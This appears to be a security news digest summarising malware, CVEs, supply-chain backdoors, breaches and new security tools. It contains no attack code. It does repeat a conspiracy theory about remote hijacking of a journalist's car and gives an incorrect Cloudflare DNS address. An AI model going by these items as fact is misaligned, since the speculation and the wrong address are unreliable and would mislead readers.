There is a first ransomware which is taking advantage of a new Process Doppelgänging fileless code injection technique. Working on all modern versions of Microsoft Windows, since Vista. This variant of a known SynAck ransomware is using NTFS transactions to launch a malicious process by replacing the memory of a legitimate process.
Security researchers from the Dutch information security company Computes has found that some Volkswagen and Audi cars are vulnerable to remote hacking. They were able to exploit vehicle infotainment systems. The possible attackers could track car location as well as listen to the conversations in a car.
Twitter found a bug that stored user passwords unmasked in an internal log, there is no indication of a breach, but all Twitter users should change their passwords.
There is a breakthrough cryptographic attack on 5-round AES using only 2^22 (previous best was 2^32) presented at CRYPTO 2018. It is joint work of Nathan Keller, Achiya Bar On, Orr Dunkelman, Eyal Ronen and Adi Shamir. This kind of attack is good when evaluating the security of a cipher, it does not have any real world implication as the AES is using at least 10 rounds in production implementations.
Bug hunter which found multiple vulnerabilities in the 7-zip software used by anti-virus vendors wrote an blog on how to exploit one of such bugs. Interesting read.
The 360 Core Security Division response team detected an APT attack exploiting a 0-day vulnerability and captured the world’s first malicious sample that uses a browser 0-day vulnerability (CVE-2018-8174). It is a remote code execution vulnerability of Windows VBScript engine and affects the latest version of Internet Explorer.
Microsoft patched this vulnerability few days ago and credited Chinese researchers.
Source code of TreasureHunter Point-of-Sale malware leaks online.
The ssh-decorator package from Python pip had an obvious backdoor (sending ip+login+password to ssh-decorate[.]cf in cleartext HTTP).
Luke Picciau wrote about his experience with Matrix and it's Riot messenger for one year.
There is a first official version 1.0 RC of Briar for Android.
Briar is an open-source End-to-end encrypted Bluetooth / WiFi / Tor based mesh-networking (decentralized) messaging application.
The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection.
There is a critical flaw in Microsoft Malware Protection Engine (CVE-2018-0986). They have used the open source unrar code, changed all the signed ints, breaking the code. Remote SYSTEM memory corruption.
Blog by Latacora about the right choices and parameters when dealing with cryptography for backups, communication, authentication, etc. Nice summary, with the explanation and historical references.
An Italian football club Lazio has been scammed by a social engineering attack via email. The club sent out transfer bill of €2 million to a fraudster’s bank account instead of the Feyenoord Dutch club.
The people behind the Google Wycheproof project, which is testing crypto libraries against known attacks released test vectors for many crypto primitives.
Cloudflare announced consumer DNS service sitting on a 220.127.116.11 address. Supports DNS-over-TLS, also DNS-over-HTTPS.
Good explanatory blog about the oblivious DNS and why DNS should not require our trust at all.
There is a local privilege escalation vulnerability (CVE-2018-0492) in the Debian beep package. Yes, beep package for motherboard beeping. Escalation, because setuid + race condition.
LibreSSL 2.7.0 was accepting all invalid host names as correct. A vulnerability was found by Python maintainer Christian Heimes when running tests after porting new LibreSSL to the Python 3.7. Nobody affected.
VirusTotal launches a new Android Sandbox system VirusTotal Droidy to help security researchers detect malicious apps based on behavioral analysis.
MesaLink is a new memory-safe and OpenSSL-compatible TLS library written in Rust.
Notoriously known Necurs spam botnet is sending millions of spam emails that are pumping shitcoin cryptocurrency named Swisscoin. Attackers are probably invested and are expecting to do pump-and-dump scheme.
Nice article on Russia's hacking capabilities against the foreign critical infrastructure.
Taiwanese police has handed malware-infected USB sticks as prizes for cybersecurity quiz. The malware was some old sample trying to communicate with non-existing C&C server in Poland. The thumb drives were infected by third-party contractor.
New research is analyzing usage of the Certificate Authority Authorization (CAA) DNS records. CAA records enable domain owners to explicitly tell which certificate authority may issue digital certificates for their domain. Only 4 of the large DNS operators that dominate the Internet’s DNS infrastructure enabled their customers to configure CAA records, but things are getting better after this audit.
Lenovo engineers have discovered a backdoor affecting RackSwitch and BladeCenter switches running ENOS (Enterprise Network Operating System). The company already released firmware updates.
The backdoor was added to the source code in 2004 when it was maintained by Nortel.
Nice technical report about PowerStager, Python / C / PowerShell malware used in the Pyeongchang Olympic themed spear phishing attack.
SfyLabs' researchers discovered a new Android banking Trojan named Red Alert 2.0, that is being offered for rent on many dark websites. It uses Twitter as a fall back mechanism for communication.
Windows cleanup utility CCleaner distributed by antivirus vendor Avast contained a multi-stage Floxif malware.
According to Slovak CSIRT, multiple Python packages in the PyPI Python repository was hit by typosquatting attack.
Medfusion 4000 Wireless Syringe Infusion Pumps used in acute critical care settings could be remotely controlled, patients killed.
Kaspersky researchers discovered a new attack technique leveraging an undocumented Microsoft Word feature that loads PHP scripts hosted on third-party web servers.
DigitalOcean warned that some pre-built and pre-configured application (One-Click) offered by the cloud platform are using default admin passwords.
A use after free error in Apache HTTP can leak pieces of arbitrary memory from the server. It's tracked as an CVE-2017-9798 "Optionsbleed" vulnerability.
Mr. SIP is a tool developed to audit and simulate SIP-based attacks.
MalwareMustDie analyzed new APT Campaign with the Poison Ivy RAT payload. Malware is using obfuscated VBScript, Power Shell to finally drop well known RAT.
"The concept of infection is fileless, it's avoiding known signature for detection by multiple encodings and wraps, and it is also 100% avoiding the original attacker's working territory."
Fake Chrome browser app named "Betaling - Google Chrome.exe" is spreading, mainly in the Netherlands. The application mimics basic browser functionality in order to steal user credit card information.
Conspiracy theory is circulating around the car crash and the death of a journalist Michael Hastings. According to the San Diego 6 News, Hastings had been investigating CIA Director John Brennan. He had also contacted WikiLeaks lawyer Jennifer Robinson just a few hours before he died, confirming that feds investigating his work. Was his vehicle remotely hijacked?
Trend Micro has uncovered the MajikPOS, new point-of-sale (PoS) malware with RAT functionality. MajikPOS targets mainly businesses in the North America and Canada. It's spreading via poorly secured VNC, RDP protocols.
Avast malware researcher Jakub Kroustek discovered the Kirk Ransomware - new Star Trek themed ransomware written in Python, probably the first one which uses Monero as the ransom payment of choice.
Researchers at the Pwn2Own competition exploited Microsoft Edge browser in a way that escapes a VMware Workstation virtual machine it runs on.
Three different exploits in a row.
Very interesting article about the history of US information warfare.
"The United States was birthed in a stew of information, misinformation, disinformation, and propaganda projected by competing entities both internally and externally. Thus, instead of looking at the apparent success of Russian intelligence in the recent election as the perfected form of information warfare, it is worth considering colonial and revolutionary America to appreciate the historical precedent and perspective"
Intel Security has released a CHIPSEC security framework able to evaluate whether the system firmware is modified.
Intel also launched its first-ever bug bounty program.